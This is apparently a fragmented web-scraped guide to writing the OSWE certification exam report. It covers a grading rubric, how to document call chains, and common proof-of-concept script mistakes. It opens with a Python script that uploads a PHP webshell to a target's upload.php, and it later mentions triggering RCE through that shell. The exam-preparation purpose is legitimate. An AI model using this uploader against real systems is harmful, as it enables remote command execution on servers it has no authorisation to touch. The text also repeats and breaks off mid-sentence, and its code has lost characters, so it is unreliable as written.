#!/usr/bin/env python3 import requests import sys target = sys.argv[1] payload = "<?php system($_GET['cmd']); ?>" files = 'file': ('shell.php', payload) r = requests.post(f"target/upload.php", files=files) print(f"Uploaded to: r.headers['Location']")
Do not treat the report as a chore. Treat it as the final exploit. Your audience (the grader) is the target. Your goal is to make their job so easy, so frictionless, that they have no choice but to click . oswe exam report
| Category | Weight | Fail Condition | | :--- | :--- | :--- | | | 40% | PoC script fails on a clean install. | | Source Code Accuracy | 25% | Line numbers are off by more than 5 lines, or the wrong file is cited. | | Reproduction Steps | 20% | A human cannot follow steps to replicate without guessing. | | Remediation | 10% | Remediation is generic ("use parameterized queries") without a code example. | | Professionalism | 5% | Spelling errors, mangled PDF formatting, missing page numbers. | Your goal is to make their job so
HTTP Request → index.php (router) → Controller/userController.php (line 40) → calls render() in Template.php (line 88) → uses eval() on user input. This shows the grader you understand the application architecture, not just the one vulnerable line. When you paste a code snippet, annotate the vulnerable lines with comments . | | Reproduction Steps | 20% | A
If you get a 100% on the hack but a 60% on the report, your overall score is ~80%, which is often a fail. Failure #1: The "Magic Cookie" Script Bad: session = "a1b2c3d4e5f6" (hardcoded). Fix: Use requests.Session() and log in programmatically via the script. Failure #2: The "Relative Path" Crash Bad: open("../../shell.php", "r") Fix: Use os.path.dirname(os.path.abspath(__file__)) to build dynamic paths. Failure #3: The "Forgotten Dependency" Bad: import impacket (not installed on base Kali). Fix: Use only standard libraries ( requests , sys , re , time ). If you must use a third-party lib, include a requirements.txt and mention it in the report header. Failure #4: The "Silent Exploit" Bad: Script runs, no output, but it works. Fix: Print [+] Webshell uploaded to /uploads/shell.php and [+] Triggering RCE... . Part 9: The 30-Minute Pre-Submission Checklist Before you zip up your report and exploit.py , set a timer for 30 minutes and run this checklist.